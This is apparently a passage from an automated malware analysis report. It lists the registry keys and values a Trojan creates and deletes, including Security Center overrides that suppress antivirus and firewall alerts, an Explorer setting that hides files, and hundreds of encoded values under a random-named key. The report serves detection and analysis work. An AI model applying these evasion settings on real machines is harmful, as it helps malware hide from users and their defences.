[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe:2092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 60 99 36 45 94 FD B0 74 2D DA A9 B8 0B 3F DD"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The process %original file name%.exe:312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Stvncyfrlda]
"m1_617" = "1053523142"
"m4_529" = "3140763709"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKCU\Software\Stvncyfrlda]
"m4_528" = "1405472976"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Stvncyfrlda]
"m2_552" = "102784434"
"m2_553" = "1838064822"
"m2_550" = "927168274"
"m2_551" = "2662449825"
"m2_556" = "2748978344"
"m2_557" = "189292766"
"m2_554" = "3573364334"
"m2_555" = "1013679912"
"m2_558" = "1924581476"
"m2_559" = "3659879799"
"m4_446" = "845553638"
"m4_537" = "4138187685"
"m4_523" = "1318953903"
"m4_522" = "3878630466"
"m1_267" = "2128677322"
"m1_266" = "1358349657"
"m1_265" = "1238050202"
"m1_264" = "3405063513"
"m1_263" = "757867412"
"m1_262" = "3051025829"
"m1_261" = "2646895186"
"m1_260" = "2944550554"
"m3_447" = "2564285818"
"m1_269" = "4168470777"
"m1_268" = "4133363715"
"m4_0" = "0"
"m4_1" = "1735290733"
"m4_2" = "3470581466"
"m4_3" = "910904903"
"m4_4" = "2646195636"
"m4_5" = "86519073"
"m4_6" = "1821809806"
"m4_7" = "3557100539"
"m4_8" = "997423976"
"m1_312" = "50943663"
"m1_311" = "1840160101"
"m1_310" = "272374340"
"m1_317" = "1182715970"
"m1_316" = "2658376845"
"m1_315" = "3652391898"
"m1_314" = "2772468233"
"m2_426" = "499479046"
"m2_427" = "2234763705"
"m2_424" = "1323866543"
"m2_425" = "3059146303"
"m2_422" = "2148251340"
"m2_423" = "3883534449"
"m2_420" = "2972636365"
"m2_421" = "412951901"
"m3_442" = "2511276059"
"m2_428" = "3970064175"
"m2_429" = "1410376162"
"m4_445" = "3405230201"
"m4_610" = "1965392314"
"m4_442" = "2494325298"
"m3_261" = "1922363400"
"m3_260" = "220872861"
"m3_263" = "1131877074"
"m3_262" = "3657786279"
"m4_129" = "514205165"
"m4_128" = "3073881728"
"m3_267" = "3777846406"
"m3_266" = "2042408299"
"m4_125" = "2162976825"
"m4_124" = "427686092"
"m4_127" = "1338590995"
"m4_126" = "3898267558"
"m4_121" = "3811748485"
"m4_120" = "2076457752"
"m4_123" = "2987362655"
"m4_122" = "1252071922"
"m3_467" = "2943756798"
"m3_466" = "1174781507"
"m3_465" = "3734703828"
"m3_464" = "2032836537"
"m3_463" = "297331722"
"m3_462" = "2823715999"
"m3_461" = "1088277856"
"m3_460" = "3681770997"
"m4_443" = "4229616031"
"m4_534" = "3227282782"
"m3_469" = "2085701784"
"m3_468" = "350280045"
"m4_29" = "3078791001"
"m4_28" = "1343500268"
"m4_23" = "1256981195"
"m4_22" = "3816657758"
"m4_21" = "2081367025"
"m4_20" = "346076292"
"m4_27" = "3903176831"
"m4_26" = "2167886098"
"m4_25" = "432595365"
"m4_24" = "2992271928"
"m4_440" = "3318711128"
"m4_615" = "2051911387"
"m1_24" = "82204513"
"m1_25" = "2328427742"
"m1_26" = "4256928343"
"m1_27" = "3679195990"
"m1_20" = "1381358557"
"m1_21" = "3396045707"
"m1_22" = "2256183590"
"m1_23" = "1890513527"
"m1_28" = "408344971"
"m1_29" = "1792020860"
"m3_199" = "1742469010"
"m3_198" = "4268311655"
"m4_305" = "982696157"
"m4_304" = "3542372720"
"m4_307" = "158310327"
"m4_306" = "2717986890"
"m4_301" = "2631467817"
"m4_300" = "896177084"
"m4_303" = "1807081987"
"m4_302" = "71791254"
"m4_309" = "3628891793"
"m4_308" = "1893601060"
"m4_495" = "4270420931"
"m4_494" = "2535130198"
"m4_497" = "3446035101"
"m4_496" = "1710744368"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKCU\Software\Stvncyfrlda]
"m4_490" = "4183901858"
"m4_493" = "799839465"
"m4_492" = "3359516028"
"m3_513" = "1162748740"
"m3_512" = "3722293289"
"m3_511" = "1953693882"
"m3_510" = "251826447"
"m4_499" = "2621649271"
"m4_498" = "886358538"
"m3_515" = "304693870"
"m3_514" = "2864239347"
"m4_279" = "3109777355"
"m4_278" = "1374486622"
"m4_271" = "2112353379"
"m4_270" = "377062646"
"m4_273" = "1287967549"
"m4_272" = "3847644112"
"m4_275" = "463581719"
"m4_274" = "3023258282"
"m4_277" = "3934163185"
"m4_276" = "2198872452"
"m3_3" = "927474798"
"m3_2" = "3487544563"
"m3_1" = "1718420804"
"m3_0" = "17001001"
"m3_7" = "3573965266"
"m3_6" = "1838544551"
"m3_5" = "69945096"
"m3_4" = "2629490589"
"m2_314" = "3715409322"
"m2_315" = "1155731386"
"m3_9" = "2749530364"
"m3_8" = "980422977"
"m2_310" = "1069218009"
"m2_311" = "2804501571"
"m2_312" = "244830792"
"m2_313" = "1980115641"
[HKCU\Software\Stvncyfrlda\168128873]
"1735290733" = "96"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Stvncyfrlda]
"m1_460" = "1266874793"
"m1_463" = "3037316856"
"m1_462" = "2343642055"
"m1_465" = "122565537"
"m1_464" = "2925759942"
"m1_467" = "2411080615"
"m1_466" = "3220234607"
"m1_469" = "2008561072"
"m1_468" = "541628957"
"m1_5" = "400461399"
"m1_4" = "899486414"
"m1_7" = "2089840013"
"m1_6" = "975944151"
"m1_1" = "2206277335"
"m1_0" = "332287070"
"m3_68" = "2018964189"
"m3_69" = "3787940424"
"m3_66" = "2877018163"
"m3_67" = "283394990"
"m3_64" = "3667439977"
"m3_65" = "1107894404"
"m3_62" = "230528591"
"m3_63" = "1965949434"
"m3_60" = "1021409189"
"m3_61" = "2756962000"
"m2_220" = "3806846472"
"m2_221" = "1247158805"
"m2_222" = "2982460362"
"m2_223" = "422778803"
"m2_224" = "2158061273"
"m2_225" = "3893359907"
"m2_226" = "1333675097"
"m2_227" = "3068974696"
"m2_228" = "509288593"
"m2_229" = "2244589702"
"m2_496" = "1710751212"
"m3_605" = "1862155952"
"m2_495" = "4270417636"
"m2_494" = "2535133606"
"m2_29" = "3078784956"
"m2_28" = "1343502649"
"m2_25" = "432601441"
"m2_24" = "2992267390"
"m2_27" = "3903183251"
"m2_26" = "2167895257"
"m2_21" = "2081370417"
"m2_20" = "346074746"
"m2_23" = "1256985182"
"m2_22" = "3816655352"
"m3_604" = "160272133"
"m2_169" = "1206361889"
"m2_168" = "3766029797"
"m2_163" = "3679513821"
"m2_162" = "1944229471"
"m2_161" = "208931501"
"m2_160" = "2768616047"
"m2_167" = "2030743464"
"m2_166" = "295456857"
"m2_165" = "2855125920"
"m2_164" = "1119845658"
"m3_438" = "4159819351"
"m3_439" = "1600289218"
"m3_436" = "689352589"
"m3_437" = "2391236408"
"m2_545" = "840641902"
"m2_544" = "3400325402"
"m2_547" = "16256273"
"m2_546" = "2575941397"
"m2_541" = "2489412717"
"m2_540" = "754127532"
"m2_543" = "1665027871"
"m2_542" = "4224712319"
"m2_549" = "3486836367"
"m2_548" = "1751555309"
"m1_258" = "1047106666"
"m1_259" = "3957904430"
"m1_252" = "3793832213"
"m1_253" = "1490415974"
"m1_250" = "3012752987"
"m1_251" = "429150645"
"m1_256" = "586137857"
"m1_257" = "2953586393"
"m1_254" = "2599298087"
"m1_255" = "1649977084"
"m1_328" = "583779169"
"m1_329" = "3516233759"
"m1_326" = "547154366"
"m1_327" = "3823432836"
"m1_324" = "506016810"
"m1_325" = "1785169166"
"m1_322" = "1229709930"
"m1_323" = "1819836157"
"m1_320" = "528487471"
"m1_321" = "4272220688"
"m2_439" = "1583422865"
"m2_438" = "4143100546"
"m2_431" = "585990157"
"m2_430" = "3145678564"
"m2_433" = "4056574439"
"m2_432" = "2321291594"
"m2_435" = "3232190442"
"m2_434" = "1496904181"
"m2_437" = "2407800886"
"m2_436" = "672518837"
"m1_319" = "4278564602"
"m3_214" = "2001882935"
"m3_215" = "3703373474"
"m3_216" = "1143826897"
"m3_217" = "2912885068"
"m3_210" = "3650358595"
"m3_211" = "1090960638"
"m3_212" = "2792828013"
"m3_213" = "266461080"
"m3_218" = "352946427"
"m3_219" = "2054830102"
"m3_328" = "2222827905"
"m3_329" = "3991820604"
"m3_458" = "177222443"
"m3_459" = "1912775238"
"m1_604" = "100579990"
"m3_320" = "1258824297"
"m3_321" = "2960842116"
"m3_322" = "434851123"
"m3_323" = "2169896110"
"m3_324" = "3871764445"
"m3_325" = "1311776584"
"m3_326" = "3080883943"
"m3_327" = "521354770"
"m4_38" = "1516538414"
"m4_39" = "3251829147"
"m1_606" = "1330996085"
"m4_9" = "2732714709"
"m4_30" = "519114438"
"m4_31" = "2254405171"
"m4_32" = "3989695904"
"m4_33" = "1430019341"
"m4_34" = "3165310074"
"m4_35" = "605633511"
"m4_36" = "2340924244"
"m4_37" = "4076214977"
"m4_598" = "2616739998"
"m4_530" = "581087146"
"m1_603" = "3548659460"
"m4_599" = "57063435"
"m1_602" = "4209119315"
"m1_11" = "1033625118"
"m1_10" = "1344860173"
"m1_13" = "4157785309"
"m1_12" = "186318157"
"m1_15" = "1023315544"
"m1_14" = "3996098252"
"m1_17" = "3833016195"
"m1_16" = "2633266203"
"m1_19" = "358018413"
"m1_18" = "493538257"
"m4_468" = "367244100"
"m4_469" = "2102534833"
"m3_528" = "1388755705"
"m3_529" = "3124177428"
"m4_460" = "3664787420"
"m4_461" = "1105110857"
"m4_462" = "2840401590"
"m4_463" = "280725027"
"m4_464" = "2016015760"
"m4_465" = "3751306493"
"m4_466" = "1191629930"
"m4_467" = "2926920663"
"m4_593" = "2530220925"
"m4_596" = "3441125828"
"m4_607" = "1054487411"
"m4_597" = "881449265"
"m4_608" = "2789778144"
"m4_609" = "230101581"
"m3_140" = "2439480757"
"m3_141" = "4140840224"
"m3_142" = "1581425759"
"m3_143" = "3350419402"
"m4_208" = "163219600"
"m4_209" = "1898510333"
"m3_146" = "4260947459"
"m3_147" = "1701482942"
"m4_204" = "1811991260"
"m4_205" = "3547281993"
"m4_206" = "987605430"
"m4_207" = "2722896163"
"m4_200" = "3460762920"
"m4_201" = "901086357"
"m4_202" = "2636377090"
"m4_203" = "76700527"
"m3_155" = "2665356502"
"m2_309" = "3628885234"
"m2_308" = "1893608174"
"m2_307" = "158302672"
"m2_306" = "2717983244"
"m2_305" = "982704089"
"m2_304" = "3542370050"
"m2_303" = "1807087593"
"m2_302" = "71789561"
"m2_301" = "2631473444"
"m2_300" = "896172138"
"m3_159" = "1016356506"
"m1_414" = "2795817973"
"m1_415" = "3374799353"
"m1_416" = "3390962981"
"m3_158" = "3609964399"
"m1_410" = "3510595105"
"m1_411" = "3284944894"
"m1_412" = "928340701"
"m1_413" = "1972203224"
"m1_418" = "877886607"
"m1_419" = "3179921219"
"m4_510" = "235010854"
"m4_511" = "1970301587"
"m3_19" = "2888904510"
"m3_18" = "1153482627"
"m4_514" = "2881206490"
"m4_515" = "321529927"
"m4_516" = "2056820660"
"m4_517" = "3792111393"
"m3_13" = "1100530336"
"m3_12" = "3626914613"
"m3_11" = "1891476358"
"m3_10" = "190001259"
"m3_17" = "3746958356"
"m3_16" = "2011536633"
"m3_15" = "243002698"
"m3_14" = "2835971551"
"m2_233" = "595817777"
"m2_232" = "3155485612"
"m2_231" = "1420202531"
"m2_230" = "3979870930"
"m2_237" = "3242014297"
"m2_236" = "1506716866"
"m2_235" = "4066402227"
"m2_234" = "2331103109"
"m2_239" = "2417627973"
"m2_238" = "682341020"
"m2_38" = "1516541930"
"m2_39" = "3251822662"
"m2_32" = "3989696872"
"m2_33" = "1430013785"
"m2_30" = "519117793"
"m2_31" = "2254398801"
"m2_36" = "2340925524"
"m2_37" = "4076208955"
"m2_34" = "3165311362"
"m2_35" = "605629119"
"m1_528" = "1767794799"
"m1_529" = "2994147206"
"m1_520" = "2251380949"
"m1_521" = "1978517788"
"m1_522" = "2497079608"
"m1_523" = "2767792857"
"m1_524" = "2952287850"
"m1_525" = "3344047930"
"m1_526" = "2289429325"
"m1_527" = "1275600600"
"m1_638" = "72680825"
"m1_639" = "4074920261"
"m2_158" = "3592999163"
"m2_159" = "1033317936"
"m2_156" = "122420357"
"m2_157" = "1857702857"
"m2_154" = "946806257"
"m2_155" = "2682088805"
"m2_152" = "1771191849"
"m2_153" = "3506474380"
"m2_150" = "2595573796"
"m2_151" = "35887433"
"m3_556" = "2732157589"
"m3_445" = "3421821520"
"m3_349" = "9342384"
"m1_249" = "2783128759"
"m1_248" = "3834691107"
"m1_245" = "89977372"
"m1_244" = "243941803"
"m1_247" = "153791120"
"m1_246" = "2202647403"
"m1_241" = "481014566"
"m1_240" = "1992163142"
"m1_243" = "2565102020"
"m1_242" = "3797638779"
"m3_269" = "2919792544"
"m2_448" = "21162605"
"m2_449" = "1756461333"
"m3_268" = "1184877621"
"m2_444" = "1669944348"
"m2_445" = "3405228082"
"m2_446" = "845549247"
"m2_447" = "2580845831"
"m2_440" = "3318716731"
"m2_441" = "759032183"
"m2_442" = "2494329222"
"m2_443" = "4229611541"
"m4_503" = "972877611"
"m4_502" = "3532554174"
"m4_501" = "1797263441"
"m1_331" = "886593873"
"m1_330" = "1204511731"
"m1_333" = "2269344119"
"m1_332" = "45758738"
"m1_335" = "1657253037"
"m1_334" = "299235905"
"m1_337" = "2090049728"
"m1_336" = "1223566946"
"m1_339" = "516636905"
"m1_338" = "3006685628"
"m4_506" = "1883782514"
"m4_505" = "148491781"
"m4_504" = "2708168344"
"m3_207" = "2739893002"
"m3_206" = "1004454815"
"m3_205" = "3530313824"
"m3_204" = "1828954357"
"m3_203" = "93401414"
"m3_202" = "2619377195"
"m3_201" = "884348604"
"m3_200" = "3477366529"
"m4_509" = "2794687417"
"m3_209" = "1881906644"
"m3_208" = "146399929"
"m3_339" = "4131317630"
"m3_338" = "2395764675"
"m3_449" = "1773274116"
"m3_448" = "4297961"
"m3_333" = "2342886112"
"m3_332" = "574352245"
"m3_331" = "3133766598"
"m3_330" = "1431881899"
"m3_337" = "694404180"
"m3_336" = "3253818681"
"m3_335" = "1484825994"
"m3_334" = "4078307871"
"m4_402" = "1802172714"
"m4_403" = "3537463447"
"m4_400" = "2626558544"
"m4_401" = "66881981"
"m4_406" = "153401054"
"m4_407" = "1888691787"
"m4_404" = "977786884"
"m4_405" = "2713077617"
"m3_531" = "2333242686"
"m3_530" = "597804419"
"m3_533" = "1508808664"
"m3_532" = "4034716845"
"m3_535" = "650753762"
"m3_534" = "3244230519"
"m3_537" = "4154773900"
"m3_536" = "2386175505"
"m3_539" = "3297243222"
"m3_538" = "1595228475"
"m4_479" = "2275572979"
"m4_478" = "540282246"
"m4_473" = "453763173"
"m4_472" = "3013439736"
"m4_471" = "1278149003"
"m4_470" = "3837825566"
"m4_477" = "3099958809"
"m4_476" = "1364668076"
"m4_475" = "3924344639"
"m4_474" = "2189053906"
"m4_606" = "3614163974"
"m3_407" = "1905282146"
"m3_291" = "2475410126"
"m3_153" = "3489919500"
"m3_152" = "1754350225"
"m3_151" = "52482914"
"m3_150" = "2612405239"
"m3_157" = "1874411504"
"m3_156" = "105417797"
"m4_219" = "2071548479"
"m3_154" = "963407291"
"m4_217" = "2895934309"
"m4_216" = "1160643576"
"m4_215" = "3720320139"
"m4_214" = "1985029406"
"m4_213" = "249738673"
"m4_212" = "2809415236"
"m4_211" = "1074124503"
"m4_210" = "3633801066"
"m4_563" = "2011106487"
"m3_409" = "1047752460"
"m1_407" = "2780381759"
"m1_406" = "3496077677"
"m1_405" = "1542645872"
"m1_404" = "349641579"
"m1_403" = "2491754946"
"m1_402" = "1709543005"
"m1_401" = "410778246"
"m1_400" = "1415041777"
"m1_409" = "3869334346"
"m1_408" = "3633528258"
"m2_332" = "590910485"
"m2_333" = "2326195666"
"m2_330" = "1415297816"
"m2_331" = "3150578331"
"m2_336" = "3237095916"
"m2_337" = "677425443"
"m2_334" = "4061492808"
"m2_335" = "1501813380"
"m2_338" = "2412708948"
"m2_339" = "4148009576"
"m2_206" = "987609805"
"m2_207" = "2722892295"
"m2_204" = "1811996275"
"m2_205" = "3547278434"
"m2_202" = "2636380453"
"m2_203" = "76693878"
"m2_200" = "3460766828"
"m2_201" = "901082009"
"m2_208" = "163224893"
"m2_209" = "1898505745"
"m3_197" = "2532889800"
"m3_196" = "831399261"
"m3_195" = "3357379118"
"m1_539" = "2219814082"
"m3_194" = "1622350515"
"m1_533" = "2670146639"
"m3_193" = "4215368452"
"m1_531" = "955937759"
"m1_530" = "17732635"
"m1_537" = "2605020955"
"m1_536" = "2113390182"
"m1_535" = "3021309809"
"m3_192" = "2479946729"
"m2_475" = "3924339512"
"m3_191" = "711346298"
"m1_629" = "2567794599"
"m2_474" = "2189057276"
"m1_627" = "2793341995"
"m1_626" = "1874045951"
"m1_625" = "154990701"
"m3_190" = "3270891727"
"m1_623" = "2184442409"
"m1_622" = "2699118757"
"m1_621" = "2626092622"
"m1_620" = "3739834425"
"m2_141" = "4157817947"
"m2_140" = "2422535851"
"m2_143" = "3333432760"
"m2_142" = "1598151312"
"m2_145" = "2509047700"
"m2_144" = "773764159"
"m2_147" = "1684663560"
"m2_146" = "4244347814"
"m2_149" = "860277965"
"m2_148" = "3419959532"
"m2_479" = "2275567315"
"m2_478" = "540285921"
"m1_532" = "2037745729"
"m1_534" = "461785975"
"m3_643" = "3412243694"
"m1_628" = "2257531934"
"m3_519" = "2984284114"
"m3_518" = "1215700135"
"m4_491" = "1624225295"
"m1_182" = "2748774479"
"m1_183" = "3453789424"
"m1_180" = "616578014"
"m1_181" = "996807637"
"m1_186" = "1957930111"
"m1_187" = "2298916277"
"m1_184" = "3766606054"
"m1_185" = "2104512924"
"m1_188" = "1853360062"
"m1_189" = "106042406"
"m2_459" = "1929502427"
"m2_458" = "194199775"
"m2_457" = "2753885435"
"m2_456" = "1018590414"
"m2_455" = "3578271205"
"m2_454" = "1842973114"
"m2_453" = "107690774"
"m2_452" = "2667355176"
"m2_451" = "932073901"
"m2_450" = "3491741982"
"m3_517" = "3808718088"
"m3_516" = "2073820573"
"m1_344" = "4031224913"
"m1_345" = "4261669520"
"m1_346" = "1845180925"
"m1_347" = "1495798530"
"m1_340" = "4107917070"
"m1_341" = "3994901791"
"m1_342" = "3100927528"
"m1_343" = "1374383541"
"m1_348" = "1383808088"
"m1_349" = "3211190306"
"m1_296" = "32700597"
"m1_297" = "2748245620"
"m1_294" = "2278797121"
"m1_295" = "515747364"
"m1_292" = "3985841999"
"m1_293" = "2634536054"
"m1_290" = "810759105"
"m1_291" = "3243511153"
"m3_232" = "3172438241"
"m3_233" = "578813980"
"m3_230" = "3963318727"
"m3_231" = "1436934514"
"m3_236" = "1489883733"
"m3_237" = "3225308608"
"m1_298" = "3130476118"
"m1_299" = "1659204371"
"m3_308" = "1910334733"
"m3_309" = "3645838520"
"m3_306" = "2734840419"
"m3_307" = "141358494"
"m3_304" = "3525786457"
"m3_305" = "999402228"
"m3_302" = "88348863"
"m3_303" = "1790347306"
"m3_300" = "879360405"
"m3_301" = "2648336640"
"m4_12" = "3643619612"
"m4_13" = "1083943049"
"m4_10" = "173038146"
"m4_11" = "1908328879"
"m4_16" = "1994847952"
"m4_17" = "3730138685"
"m4_14" = "2819233782"
"m4_15" = "259557219"
"m4_18" = "1170462122"
"m4_19" = "2905752855"
"m4_447" = "2580844371"
"m3_544" = "3417288073"
"m3_545" = "857234724"
"m3_546" = "2559233107"
"m3_547" = "33259470"
"m3_540" = "770728901"
"m3_541" = "2506232688"
"m3_542" = "4207706863"
"m3_543" = "1648177690"
"m3_548" = "1768288125"
"m3_549" = "3470237416"
"m4_198" = "4285148750"
"m4_199" = "1725472187"
"m4_448" = "21167808"
"m4_449" = "1756458541"
"m4_194" = "1638953114"
"m4_195" = "3374243847"
"m4_196" = "814567284"
"m4_197" = "2549858017"
"m4_190" = "3287724774"
"m4_191" = "728048211"
"m4_192" = "2463338944"
"m4_193" = "4198629677"
"m3_496" = "1693747481"
"m3_497" = "3429185716"
"m3_494" = "2518183551"
"m3_495" = "4287240682"
"m3_492" = "3376238421"
"m3_493" = "783285952"
"m3_490" = "4167183499"
"m3_491" = "1640815654"
"m3_498" = "903325731"
"m3_499" = "2638240606"
"m4_222" = "2982453382"
"m4_223" = "422776819"
"m1_79" = "1913234704"
"m1_78" = "4118415213"
"m4_226" = "1333681722"
"m4_227" = "3068972455"
"m4_224" = "2158067552"
"m4_225" = "3893358285"
"m1_73" = "1982944427"
"m1_72" = "4180144338"
"m1_71" = "2005941269"
"m1_70" = "503825556"
"m1_77" = "3267195005"
"m1_76" = "3320388867"
"m1_75" = "1263983444"
"m1_74" = "3775077689"
"m3_166" = "278866567"
"m3_167" = "2013911602"
"m3_164" = "1136397309"
"m3_165" = "2871966568"
"m3_162" = "1927407827"
"m3_163" = "3662911566"
"m3_160" = "2751909385"
"m3_161" = "225933732"
"m3_168" = "3782899105"
"m3_169" = "1189405916"
"m3_641" = "4203189700"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKCU\Software\Stvncyfrlda]
"m4_444" = "1669939468"
"m1_438" = "2315978367"
"m1_439" = "2225657903"
"m1_432" = "3551539276"
"m1_433" = "3612631014"
"m1_430" = "2789880429"
"m1_431" = "2369905663"
"m1_436" = "530284453"
"m1_437" = "3453828564"
"m1_434" = "2839951551"
"m1_435" = "2625405315"
"m3_35" = "622481870"
"m3_34" = "3182011987"
"m3_37" = "4092948712"
"m3_36" = "2323956093"
"m3_31" = "2270958618"
"m3_30" = "535979247"
"m3_33" = "1413429028"
"m3_32" = "3972958089"
"m3_39" = "3234960306"
"m3_38" = "1533534215"
"m4_538" = "1578511122"
"m4_539" = "3313801855"
"m2_219" = "2071544553"
"m2_218" = "336262027"
"m2_211" = "1074118817"
"m2_210" = "3633803533"
"m2_213" = "249735947"
"m2_212" = "2809420030"
"m2_215" = "3720315361"
"m2_214" = "1985033364"
"m2_217" = "2895930442"
"m2_216" = "1160647470"
"m3_636" = "4150245605"
"m3_637" = "1556621328"
"m3_634" = "645700059"
"m3_635" = "2414676342"
"m1_508" = "654102370"
"m1_509" = "185768158"
"m1_506" = "200630984"
"m1_507" = "618373824"
"m1_504" = "2109669623"
"m1_505" = "1002055091"
"m1_502" = "3149251936"
"m1_503" = "3499407923"
"m1_500" = "4080341079"
"m1_501" = "2522258912"
"m3_630" = "2294635543"
"m3_631" = "4030189442"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Stvncyfrlda]
"m2_134" = "600722970"
"m2_135" = "2336020347"
"m2_136" = "4071303536"
"m2_137" = "1511636373"
"m2_130" = "2249493472"
"m2_131" = "3984791373"
"m2_132" = "1425105309"
"m2_133" = "3160405037"
"m1_618" = "316096425"
"m1_619" = "2690853336"
"m2_138" = "3246915604"
"m2_139" = "687247672"
"m2_318" = "2066643963"
"m2_319" = "3801923760"
"m2_316" = "2891029696"
"m2_317" = "331345419"
"m2_598" = "2616744826"
"m2_599" = "57063239"
"m2_596" = "3441128384"
"m2_597" = "881445490"
"m2_594" = "4265516985"
"m2_595" = "1705828793"
"m2_592" = "794932259"
"m2_593" = "2530216593"
"m2_590" = "1619317059"
"m2_591" = "3354603349"
"m1_195" = "1980927161"
"m1_194" = "821663117"
"m1_197" = "2586557690"
"m1_196" = "4121135620"
"m1_191" = "2666963066"
"m1_190" = "788902834"
"m1_193" = "3821883762"
"m1_192" = "3713684974"
"m2_468" = "367240176"
"m2_469" = "2102539581"
"m1_199" = "3890929863"
"m1_198" = "1001532501"
"m1_357" = "2384757589"
"m1_356" = "3921153804"
"m1_355" = "1141364893"
"m1_354" = "2853569671"
"m1_353" = "3768368376"
"m1_352" = "1191078490"
"m1_351" = "1611402247"
"m1_350" = "1510943824"
"m1_359" = "1540493462"
"m1_358" = "110393856"
"m1_461" = "3493105467"
"m1_289" = "2116733206"
"m1_288" = "4285035474"
"m3_229" = "2227881640"
"m3_228" = "525883197"
"m1_281" = "2023017824"
"m1_280" = "22339581"
"m3_227" = "3085936526"
"m3_226" = "1316828179"
"m1_285" = "2150754031"
"m1_284" = "1540255391"
"m3_223" = "405824986"
"m3_222" = "2965883567"
"m1_380" = "944743495"
"m3_520" = "424755009"
"m1_381" = "3742644810"
"m1_382" = "608581789"
"m1_383" = "1937530528"
"m1_384" = "2451639613"
"m1_385" = "1978774364"
"m1_386" = "1201472671"
"m1_387" = "1812145423"
"m3_311" = "2787784514"
"m3_310" = "1052346327"
"m3_313" = "1996838508"
"m3_312" = "261400305"
"m3_315" = "1172336950"
"m3_314" = "3698835867"
"m3_317" = "314348496"
"m3_316" = "2907889829"
"m3_319" = "3818894074"
"m3_318" = "2049770319"
"m4_451" = "932072711"
"m2_255" = "117501284"
"m4_453" = "107686881"
"m4_452" = "2667363444"
"m4_455" = "3578268347"
"m4_454" = "1842977614"
"m4_457" = "2753882517"
"m2_254" = "2677184168"
"m4_459" = "1929496687"
"m4_458" = "194205954"
"m3_559" = "3676710186"
"m3_558" = "1941288383"
"m4_189" = "1552434041"
"m4_188" = "4112110604"
"m4_187" = "2376819871"
"m4_186" = "641529138"
"m4_185" = "3201205701"
"m4_184" = "1465914968"
"m4_183" = "4025591531"
"m4_182" = "2290300798"
"m4_181" = "555010065"
"m4_180" = "3114686628"
"m3_489" = "2431761692"
"m3_401" = "50324372"
"m1_3" = "2582403220"
"m3_400" = "2643292281"
"m3_481" = "1467757028"
"m3_480" = "3994256969"
"m3_483" = "610226318"
"m1_2" = "4033193091"
"m3_485" = "4114248616"
"m3_403" = "3554280126"
"m3_487" = "3256259186"
"m3_486" = "1520755399"
"m3_402" = "1785303811"
"m3_405" = "2696228184"
"m3_404" = "994357805"
"m1_68" = "1769901637"
"m1_69" = "2567323868"
"m4_237" = "3242010601"
"m4_236" = "1506719868"
"m4_231" = "1420200795"
"m4_230" = "3979877358"
"m4_233" = "595814965"
"m4_232" = "3155491528"
"m1_60" = "3204659430"
"m2_259" = "2763697419"
"m1_62" = "717154010"
"m1_63" = "3357743023"
"m1_64" = "2418231550"
"m1_65" = "1556493841"
"m1_66" = "2534914724"
"m1_67" = "525926733"
"m3_179" = "1395950366"
"m3_178" = "3955889123"
"m3_408" = "3640852369"
"m3_171" = "398919654"
"m3_170" = "2924909643"
"m3_173" = "3835831936"
"m3_172" = "2133964565"
"m3_175" = "3044884906"
"m3_174" = "1275909695"
"m3_177" = "2186829940"
"m3_176" = "451932377"
"m3_566" = "2938712279"
"m3_567" = "345743426"
"m1_429" = "4065109702"
"m1_428" = "4150340323"
"m1_425" = "647889562"
"m1_424" = "83707901"
"m1_427" = "3289792235"
"m1_426" = "2417347347"
"m1_421" = "697669691"
"m1_420" = "1035417531"
"m1_423" = "1888118349"
"m1_422" = "512782961"
"m3_22" = "3799972215"
"m3_23" = "1273981154"
"m3_20" = "363060909"
"m3_21" = "2097957336"
"m3_26" = "2150906683"
"m3_27" = "3920013910"
"m3_24" = "3008960529"
"m3_25" = "415992716"
"m4_521" = "2143339733"
"m4_520" = "408049000"
"m3_28" = "1360479685"
"m3_29" = "3061970288"
"m4_525" = "494568073"
"m4_524" = "3054244636"
"m4_527" = "3965149539"
"m4_526" = "2229858806"
"m2_268" = "1201451835"
"m2_269" = "2936735283"
"m2_264" = "2850225944"
"m2_265" = "290540669"
"m2_266" = "2025838886"
"m2_267" = "3761120011"
"m2_260" = "204029132"
"m2_261" = "1939308893"
"m2_262" = "3674608690"
"m2_263" = "1114925371"
"m1_511" = "313969637"
"m1_510" = "75685972"
"m1_513" = "2745450716"
"m1_512" = "4056296295"
"m1_515" = "3747584253"
"m1_514" = "4086806112"
"m1_517" = "53407030"
"m1_516" = "814228893"
"m1_519" = "47326276"
"m1_518" = "3885210427"
"m2_493" = "799835656"
"m2_492" = "3359519206"
"m2_127" = "1338594519"
"m2_126" = "3898262281"
"m2_125" = "2162979700"
"m2_124" = "427679896"
"m2_123" = "2987365503"
"m2_122" = "1252068270"
"m2_121" = "3811752952"
"m2_120" = "2076453871"
"m1_609" = "3861078015"
"m1_608" = "2558906543"
"m2_129" = "514209481"
"m2_128" = "3073876092"
[HKCU\Software\Stvncyfrlda\168128873]
"-824385830" = "0"
[HKCU\Software\Stvncyfrlda]
"m4_441" = "759034565"
"m2_490" = "4183907872"
"m2_497" = "3446033159"
